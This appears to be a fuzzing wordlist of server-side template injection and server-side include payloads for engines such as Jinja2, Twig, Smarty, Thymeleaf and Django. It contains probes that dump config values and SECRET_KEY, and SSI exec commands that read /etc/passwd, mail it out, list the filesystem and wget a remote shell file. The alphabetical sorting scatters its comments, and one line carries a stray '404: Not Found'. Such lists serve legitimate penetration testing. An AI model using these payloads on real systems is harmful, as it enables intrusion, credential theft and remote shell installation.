# 
${{7*7}}
${7*7}
$context.keys
$context.TOOLS_VERSION
$field.in("org.apache.velocity.runtime.RuntimeConstants")
$field.in("org.apache.velocity.runtime.VelocityEngineVersion")
$smarty.config
$smarty.template
$smarty.version
1/0
#{7*7}
*{7*7}
<%= 7*7 %>
{{7*'7'}}
{{7*7}}
{{''.__class__.__mro__[0]}}
{{''.__class__.__mro__[1]}}
{{''.__class__.__mro__[10]}}
{{''.__class__.__mro__[11]}}
{{''.__class__.__mro__[12]}}
{{''.__class__.__mro__[13]}}
{{''.__class__.__mro__[14]}}
{{''.__class__.__mro__[15]}}
{{''.__class__.__mro__[16]}}
{{''.__class__.__mro__[17]}}
{{''.__class__.__mro__[18]}}
{{''.__class__.__mro__[19]}}
{{''.__class__.__mro__[2]}}
{{''.__class__.__mro__[20]}}
{{''.__class__.__mro__[21]}}
{{''.__class__.__mro__[22]}}
{{''.__class__.__mro__[23]}}
{{''.__class__.__mro__[24]}}
{{''.__class__.__mro__[25]}}
{{''.__class__.__mro__[26]}}
{{''.__class__.__mro__[27]}}
{{''.__class__.__mro__[28]}}
{{''.__class__.__mro__[29]}}
{{''.__class__.__mro__[3]}}
{{''.__class__.__mro__[30]}}
{{''.__class__.__mro__[31]}}
{{''.__class__.__mro__[32]}}
{{''.__class__.__mro__[33]}}
{{''.__class__.__mro__[34]}}
{{''.__class__.__mro__[35]}}
{{''.__class__.__mro__[36]}}
{{''.__class__.__mro__[37]}}
{{''.__class__.__mro__[38]}}
{{''.__class__.__mro__[39]}}
{{''.__class__.__mro__[4]}}
{{''.__class__.__mro__[40]}}
{{''.__class__.__mro__[41]}}
{{''.__class__.__mro__[42]}}
{{''.__class__.__mro__[43]}}
{{''.__class__.__mro__[44]}}
{{''.__class__.__mro__[45]}}
{{''.__class__.__mro__[46]}}
{{''.__class__.__mro__[47]}}
{{''.__class__.__mro__[48]}}
{{''.__class__.__mro__[49]}}
{{''.__class__.__mro__[5]}}
{{''.__class__.__mro__[6]}}
{{''.__class__.__mro__[7]}}
{{''.__class__.__mro__[8]}}
{{''.__class__.__mro__[9]}}
<!--#config errmsg="File not found, informs users and password"-->
{{config.items()[0]}}
{{config.items()[1]}}
{{config.items()[10]}}
{{config.items()[11]}}
{{config.items()[12]}}
{{config.items()[13]}}
{{config.items()[14]}}
{{config.items()[15]}}
{{config.items()[16]}}
{{config.items()[17]}}
{{config.items()[18]}}
{{config.items()[19]}}
{{config.items()[2]}}
{{config.items()[20]}}
{{config.items()[21]}}
{{config.items()[22]}}
{{config.items()[23]}}
{{config.items()[24]}}
{{config.items()[25]}}
{{config.items()[26]}}
{{config.items()[27]}}
{{config.items()[28]}}
{{config.items()[29]}}
{{config.items()[3]}}
{{config.items()[30]}}
{{config.items()[31]}}
{{config.items()[32]}}
{{config.items()[33]}}
{{config.items()[34]}}
{{config.items()[35]}}
{{config.items()[36]}}
{{config.items()[37]}}
{{config.items()[38]}}
{{config.items()[39]}}
{{config.items()[4]}}
{{config.items()[40]}}
{{config.items()[41]}}
{{config.items()[42]}}
{{config.items()[43]}}
{{config.items()[44]}}
{{config.items()[45]}}
{{config.items()[46]}}
{{config.items()[47]}}
{{config.items()[48]}}
{{config.items()[49]}}
{{config.items()[5]}}
{{config.items()[6]}}
{{config.items()[7]}}
{{config.items()[8]}}
{{config.items()[9]}}
<!--#config timefmt="A %B %d %Y %r"-->
constant('Twig_Environment::EXTRA_VERSION')
constant('Twig_Environment::VERSION')
constant('Twig_Environment::VERSION_ID')
_context
_context|keys|first
_context|length
.current_template_name
# Custom personal labs
# DJANGO (PYTHON)
<!--#echo var="auth_type" -->
<!--#echo var="content_length" -->
<!--#echo var="content_type" -->
<!--#echo var="date_gmt" -->
<!--#echo var="date_local" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="document_name" -->
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="document_root" -->
<!--#echo var="document_uri" -->
<!--#echo var="DOCUMENT_URI" -->
<!--#echo var="forwarded" -->
<!--#echo var="from" -->
<!--#echo var="gateway_interface" -->
<!--#echo var="http_accept" -->
<!--#echo var="http_accept_charset" -->
<!--#echo var="http_accept_encoding" -->
<!--#echo var="http_accept_language" -->
<!--#echo var="http_client_ip" -->
<!--#echo var="http_connection" -->
<!--#echo var="http_cookie" -->
<!--#echo var="http_form" -->
<!--#echo var="http_host" -->
<!--#echo var="http_referer" -->
<!--#echo var="http_ua_cpu" -->
<!--#echo var="http_ua_os" -->
<!--#echo var="http_user_agent" -->
<!--#echo var="last_modified" -->
<!--#echo var="netsite_root" -->
<!--#echo var="page_count" -->
<!--#echo var="path" -->
<!--#echo var="path_info" -->
<!--#echo var="path_info_translated" -->
<!--#echo var="path_translated" -->
<!--#echo var="query_string" -->
<!--#echo var="query_string_unescaped" -->
<!--#echo var="remote_addr" -->
<!--#echo var="remote_host" -->
<!--#echo var="remote_ident" -->
<!--#echo var="remote_port" -->
<!--#echo var="remote_user" -->
<!--#echo var="request_method" -->
<!--#echo var="request_uri" -->
<!--#echo var="script_filename" -->
<!--#echo var="script_name" -->
<!--#echo var="script_uri" -->
<!--#echo var="script_url" -->
<!--#echo var="server_addr" -->
<!--#echo var="server_admin" -->
<!--#echo var="server_name -->
<!--#echo var="server_port" -->
<!--#echo var="server_protocol" -->
<!--#echo var="server_software" -->
<!--#echo var="site_htmlroot" -->
<!--#echo var="total_hits" -->
<!--#echo var="tz" -->
<!--#echo var="unique_id" -->
<!--#echo var="user_name" -->
# ERB (RUBY)
ERB.version()
<!--#exec cmd="/bin/ls /" -->
<!--#exec cmd="/bin/ls /" --><br/>
<!--#exec cmd="cat /etc/passwd" --><br/>
<!--#exec cmd="cd C:\WINDOWS\System32">
<!--#exec cmd="dir" -->
<!--#exec cmd="find / -name *.* -print" --><br/>
<!--#exec cmd="ls" -->
<!--#exec cmd="mail email@dom.tld <mailto:email@dom.tld> < cat /etc/passwd" --><br/>
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
<!--#exec cmd="whoami"-->
#execInfo
execInfo
#execInfo.templateStack
execInfo.templateStack
#execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
execInfo.templateStack[0].getClass.forName("org.thymeleaf.Thymeleaf").getField("VERSION").get(null)
<!--#flastmod virtual="echo.html" -->
# FREEMARKER (JAVA)
<!--#fsize file="ssi.shtml" -->
# GENERIC: To cause an error and perhaps get technical information
global
globals()
# https://docs.djangoproject.com/en/3.1/ref/settings/
# https://freemarker.apache.org/docs/ref_specvar.html
# https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/template-engines-expression.txt
# https://github.com/epinna/tplmap
# https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
# https://portswigger.net/research/server-side-template-injection
# https://pugjs.org
# https://ruby-doc.org/stdlib-2.7.1/libdoc/erb/rdoc/ERB.html
# https://stackoverflow.com/a/40346872/451455
# https://twig.symfony.com/doc/3.x/
# https://www.smarty.net/docs/en/language.syntax.variables.tpl
# https://www.smarty.net/docs/en/language.variables.smarty.tpl#language.variables.smarty.config
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#execution-info
# https://www.thymeleaf.org/doc/tutorials/3.0/usingthymeleaf.html#variables
# https://www.tornadoweb.org/en/stable/template.html
# http://velocity.apache.org/tools/devel/generic.html
# In case of hit then use "Object.keys(VAR_NAME)" to explore the object properties
<!--#include file=?UUUUUUUU...UU?-->
# Indicate to your fuzzer to ignore a line starting with: "# " (space is important)
# JINJA2 (PYTHON)
.locale_object
locals
locals()
# once a evaluation of a template expression was detected via the following dictionary:
# Payload below are more NodeJS related
<pre><!--#echo var="DATE_LOCAL" --> </pre>
<pre><!--#exec cmd="dir" --></pre>
<pre><!--#exec cmd="ls" --></pre>
<pre><!--#exec cmd="whoami"--></pre>
# Presence of variables with a name starting with "_tt_" indicate usage of Tornado
<!--#printenv -->
# PUG (NODEJS)
_self
self
{{_self.env.getCache().getTimestamp('0')}}
{{_self.env.getCache().getTimestamp('1')}}
{{_self.env.getCache().getTimestamp('10')}}
{{_self.env.getCache().getTimestamp('11')}}
{{_self.env.getCache().getTimestamp('12')}}
{{_self.env.getCache().getTimestamp('13')}}
{{_self.env.getCache().getTimestamp('14')}}
{{_self.env.getCache().getTimestamp('15')}}
{{_self.env.getCache().getTimestamp('16')}}
{{_self.env.getCache().getTimestamp('17')}}
{{_self.env.getCache().getTimestamp('18')}}
{{_self.env.getCache().getTimestamp('19')}}404: Not Found
{{_self.env.getCache().getTimestamp('2')}}
{{_self.env.getCache().getTimestamp('3')}}
{{_self.env.getCache().getTimestamp('4')}}
{{_self.env.getCache().getTimestamp('5')}}
{{_self.env.getCache().getTimestamp('6')}}
{{_self.env.getCache().getTimestamp('7')}}
{{_self.env.getCache().getTimestamp('8')}}
{{_self.env.getCache().getTimestamp('9')}}
_self.getTemplateName().__toString
# Self object is available if the "self" options is set to true
self._TemplateReference__context
settings
settings.DATABASES
settings.DEBUG
settings.SECRET_KEY
# SMARTY (PHP)
# Sources:
# Special variables are grouped by template engine in order to facilitate the identification.
# The objective of this dictionary is to help to discover the template engine used
# THYMELEAF (JAVA)
# TORNADO (PYTHON)
# TWIG (PHP)
# Use the term between the expression syntax identified as evaluated like "{{ xxx }}" for example.
# VELOCITY (JAVA)
.version
# You can also filter the dictionary before to use it via the command: grep -v "# " > dict.txt
